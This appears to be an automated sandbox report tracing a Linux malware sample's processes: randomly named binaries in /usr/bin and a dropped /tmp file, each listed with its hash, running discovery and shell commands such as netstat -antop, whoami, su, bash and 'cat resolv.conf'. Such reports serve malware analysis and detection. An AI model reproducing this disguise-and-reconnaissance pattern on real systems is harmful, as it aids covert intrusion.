                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/lzqmjtjpqw
                                                                  Arguments:/usr/bin/lzqmjtjpqw ifconfig 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:7a667d082ecd9ac2cdd0aeabc5b8446d

                                                                  General

                                                                  Start time:19:42:09
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/lzqmjtjpqw
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:7a667d082ecd9ac2cdd0aeabc5b8446d

                                                                  General

                                                                  Start time:19:42:09
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:09
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:09
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/lzqmjtjpqw
                                                                  Arguments:/usr/bin/lzqmjtjpqw top 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:7a667d082ecd9ac2cdd0aeabc5b8446d

                                                                  General

                                                                  Start time:19:42:09
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/lzqmjtjpqw
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:7a667d082ecd9ac2cdd0aeabc5b8446d

                                                                  General

                                                                  Start time:19:42:09
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:09
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:09
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/lzqmjtjpqw
                                                                  Arguments:/usr/bin/lzqmjtjpqw su 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:7a667d082ecd9ac2cdd0aeabc5b8446d

                                                                  General

                                                                  Start time:19:42:10
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/lzqmjtjpqw
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:7a667d082ecd9ac2cdd0aeabc5b8446d

                                                                  General

                                                                  Start time:19:42:09
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:09
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:09
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/lzqmjtjpqw
                                                                  Arguments:/usr/bin/lzqmjtjpqw "grep \"A\"" 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:7a667d082ecd9ac2cdd0aeabc5b8446d

                                                                  General

                                                                  Start time:19:42:10
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/lzqmjtjpqw
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:7a667d082ecd9ac2cdd0aeabc5b8446d

                                                                  General

                                                                  Start time:19:42:15
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:15
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:15
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/zhoomtcmjp
                                                                  Arguments:/usr/bin/zhoomtcmjp "cd /etc" 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:4a782eb3638511f2dab1b84597fab9d0

                                                                  General

                                                                  Start time:19:42:15
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/zhoomtcmjp
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:4a782eb3638511f2dab1b84597fab9d0

                                                                  General

                                                                  Start time:19:42:15
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:15
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:15
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/zhoomtcmjp
                                                                  Arguments:/usr/bin/zhoomtcmjp "echo \"find\"" 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:4a782eb3638511f2dab1b84597fab9d0

                                                                  General

                                                                  Start time:19:42:15
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/zhoomtcmjp
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:4a782eb3638511f2dab1b84597fab9d0

                                                                  General

                                                                  Start time:19:42:15
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:15
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:15
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/zhoomtcmjp
                                                                  Arguments:/usr/bin/zhoomtcmjp "netstat -antop" 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:4a782eb3638511f2dab1b84597fab9d0

                                                                  General

                                                                  Start time:19:42:15
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/zhoomtcmjp
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:4a782eb3638511f2dab1b84597fab9d0

                                                                  General

                                                                  Start time:19:42:15
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:15
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:15
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/zhoomtcmjp
                                                                  Arguments:/usr/bin/zhoomtcmjp sh 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:4a782eb3638511f2dab1b84597fab9d0

                                                                  General

                                                                  Start time:19:42:16
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/zhoomtcmjp
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:4a782eb3638511f2dab1b84597fab9d0

                                                                  General

                                                                  Start time:19:42:15
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:15
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:15
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/zhoomtcmjp
                                                                  Arguments:/usr/bin/zhoomtcmjp "grep \"A\"" 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:4a782eb3638511f2dab1b84597fab9d0

                                                                  General

                                                                  Start time:19:42:16
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/zhoomtcmjp
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:4a782eb3638511f2dab1b84597fab9d0

                                                                  General

                                                                  Start time:19:42:21
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:21
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:21
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/prxseumwxz
                                                                  Arguments:/usr/bin/prxseumwxz su 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:08eba567ddd53fde82e9510321ba57ab

                                                                  General

                                                                  Start time:19:42:21
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/prxseumwxz
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:08eba567ddd53fde82e9510321ba57ab

                                                                  General

                                                                  Start time:19:42:21
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:21
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:21
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/prxseumwxz
                                                                  Arguments:/usr/bin/prxseumwxz su 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:08eba567ddd53fde82e9510321ba57ab

                                                                  General

                                                                  Start time:19:42:21
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/prxseumwxz
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:08eba567ddd53fde82e9510321ba57ab

                                                                  General

                                                                  Start time:19:42:21
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:21
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:21
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/prxseumwxz
                                                                  Arguments:/usr/bin/prxseumwxz whoami 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:08eba567ddd53fde82e9510321ba57ab

                                                                  General

                                                                  Start time:19:42:21
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/prxseumwxz
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:08eba567ddd53fde82e9510321ba57ab

                                                                  General

                                                                  Start time:19:42:21
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:21
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:21
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/prxseumwxz
                                                                  Arguments:/usr/bin/prxseumwxz "echo \"find\"" 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:08eba567ddd53fde82e9510321ba57ab

                                                                  General

                                                                  Start time:19:42:21
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/prxseumwxz
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:08eba567ddd53fde82e9510321ba57ab

                                                                  General

                                                                  Start time:19:42:21
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:21
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:21
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/prxseumwxz
                                                                  Arguments:/usr/bin/prxseumwxz top 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:08eba567ddd53fde82e9510321ba57ab

                                                                  General

                                                                  Start time:19:42:21
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/prxseumwxz
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:08eba567ddd53fde82e9510321ba57ab

                                                                  General

                                                                  Start time:19:42:27
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:27
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:27
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/diqdbkzgzt
                                                                  Arguments:/usr/bin/diqdbkzgzt su 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:7741291f841e1def53aa3ea5f6fada97

                                                                  General

                                                                  Start time:19:42:27
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/diqdbkzgzt
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:7741291f841e1def53aa3ea5f6fada97

                                                                  General

                                                                  Start time:19:42:27
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:27
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:27
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/diqdbkzgzt
                                                                  Arguments:/usr/bin/diqdbkzgzt "netstat -antop" 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:7741291f841e1def53aa3ea5f6fada97

                                                                  General

                                                                  Start time:19:42:27
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/diqdbkzgzt
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:7741291f841e1def53aa3ea5f6fada97

                                                                  General

                                                                  Start time:19:42:27
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:27
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:27
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/diqdbkzgzt
                                                                  Arguments:/usr/bin/diqdbkzgzt id 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:7741291f841e1def53aa3ea5f6fada97

                                                                  General

                                                                  Start time:19:42:27
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/diqdbkzgzt
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:7741291f841e1def53aa3ea5f6fada97

                                                                  General

                                                                  Start time:19:42:27
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:27
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:27
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/diqdbkzgzt
                                                                  Arguments:/usr/bin/diqdbkzgzt su 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:7741291f841e1def53aa3ea5f6fada97

                                                                  General

                                                                  Start time:19:42:27
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/diqdbkzgzt
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:7741291f841e1def53aa3ea5f6fada97

                                                                  General

                                                                  Start time:19:42:27
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:27
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:27
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/diqdbkzgzt
                                                                  Arguments:/usr/bin/diqdbkzgzt bash 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:7741291f841e1def53aa3ea5f6fada97

                                                                  General

                                                                  Start time:19:42:27
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/diqdbkzgzt
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:7741291f841e1def53aa3ea5f6fada97

                                                                  General

                                                                  Start time:19:42:32
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:32
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:32
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/nykjhwzoix
                                                                  Arguments:/usr/bin/nykjhwzoix sh 5218
                                                                  File size:548638 bytes
                                                                  MD5 hash:87054193295ea4efa805d88d42c70b4f

                                                                  General

                                                                  Start time:19:42:32
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/nykjhwzoix
                                                                  Arguments:n/a
                                                                  File size:548638 bytes
                                                                  MD5 hash:87054193295ea4efa805d88d42c70b4f

                                                                  General

                                                                  Start time:19:42:32
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:32
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:32
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/nykjhwzoix
                                                                  Arguments:/usr/bin/nykjhwzoix ifconfig 5218
                                                                  File size:548638 bytes
                                                                  MD5 hash:87054193295ea4efa805d88d42c70b4f

                                                                  General

                                                                  Start time:19:42:32
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/nykjhwzoix
                                                                  Arguments:n/a
                                                                  File size:548638 bytes
                                                                  MD5 hash:87054193295ea4efa805d88d42c70b4f

                                                                  General

                                                                  Start time:19:42:32
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:32
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:32
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/nykjhwzoix
                                                                  Arguments:/usr/bin/nykjhwzoix ls 5218
                                                                  File size:548638 bytes
                                                                  MD5 hash:87054193295ea4efa805d88d42c70b4f

                                                                  General

                                                                  Start time:19:42:32
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/nykjhwzoix
                                                                  Arguments:n/a
                                                                  File size:548638 bytes
                                                                  MD5 hash:87054193295ea4efa805d88d42c70b4f

                                                                  General

                                                                  Start time:19:42:32
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:32
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:32
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/nykjhwzoix
                                                                  Arguments:/usr/bin/nykjhwzoix uptime 5218
                                                                  File size:548638 bytes
                                                                  MD5 hash:87054193295ea4efa805d88d42c70b4f

                                                                  General

                                                                  Start time:19:42:32
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/nykjhwzoix
                                                                  Arguments:n/a
                                                                  File size:548638 bytes
                                                                  MD5 hash:87054193295ea4efa805d88d42c70b4f

                                                                  General

                                                                  Start time:19:42:32
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:32
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:32
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/nykjhwzoix
                                                                  Arguments:/usr/bin/nykjhwzoix who 5218
                                                                  File size:548638 bytes
                                                                  MD5 hash:87054193295ea4efa805d88d42c70b4f

                                                                  General

                                                                  Start time:19:42:32
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/nykjhwzoix
                                                                  Arguments:n/a
                                                                  File size:548638 bytes
                                                                  MD5 hash:87054193295ea4efa805d88d42c70b4f

                                                                  General

                                                                  Start time:19:42:37
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:37
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:37
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ygkfhnfkvx
                                                                  Arguments:/usr/bin/ygkfhnfkvx "netstat -antop" 5218
                                                                  File size:548638 bytes
                                                                  MD5 hash:a9c911cfbcfeb76d8d0949a8b819b9ff

                                                                  General

                                                                  Start time:19:42:37
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ygkfhnfkvx
                                                                  Arguments:n/a
                                                                  File size:548638 bytes
                                                                  MD5 hash:a9c911cfbcfeb76d8d0949a8b819b9ff

                                                                  General

                                                                  Start time:19:42:37
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:37
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:37
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ygkfhnfkvx
                                                                  Arguments:/usr/bin/ygkfhnfkvx "echo \"find\"" 5218
                                                                  File size:548638 bytes
                                                                  MD5 hash:a9c911cfbcfeb76d8d0949a8b819b9ff

                                                                  General

                                                                  Start time:19:42:37
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ygkfhnfkvx
                                                                  Arguments:n/a
                                                                  File size:548638 bytes
                                                                  MD5 hash:a9c911cfbcfeb76d8d0949a8b819b9ff

                                                                  General

                                                                  Start time:19:42:37
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:37
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:37
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ygkfhnfkvx
                                                                  Arguments:/usr/bin/ygkfhnfkvx "cat resolv.conf" 5218
                                                                  File size:548638 bytes
                                                                  MD5 hash:a9c911cfbcfeb76d8d0949a8b819b9ff

                                                                  General

                                                                  Start time:19:42:37
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ygkfhnfkvx
                                                                  Arguments:n/a
                                                                  File size:548638 bytes
                                                                  MD5 hash:a9c911cfbcfeb76d8d0949a8b819b9ff

                                                                  General

                                                                  Start time:19:42:37
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:37
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:37
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ygkfhnfkvx
                                                                  Arguments:/usr/bin/ygkfhnfkvx whoami 5218
                                                                  File size:548638 bytes
                                                                  MD5 hash:a9c911cfbcfeb76d8d0949a8b819b9ff

                                                                  General

                                                                  Start time:19:42:37
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ygkfhnfkvx
                                                                  Arguments:n/a
                                                                  File size:548638 bytes
                                                                  MD5 hash:a9c911cfbcfeb76d8d0949a8b819b9ff

                                                                  General

                                                                  Start time:19:42:37
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:37
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:37
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ygkfhnfkvx
                                                                  Arguments:/usr/bin/ygkfhnfkvx who 5218
                                                                  File size:548638 bytes
                                                                  MD5 hash:a9c911cfbcfeb76d8d0949a8b819b9ff

                                                                  General

                                                                  Start time:19:42:37
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ygkfhnfkvx
                                                                  Arguments:n/a
                                                                  File size:548638 bytes
                                                                  MD5 hash:a9c911cfbcfeb76d8d0949a8b819b9ff

                                                                  General

                                                                  Start time:19:42:42
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
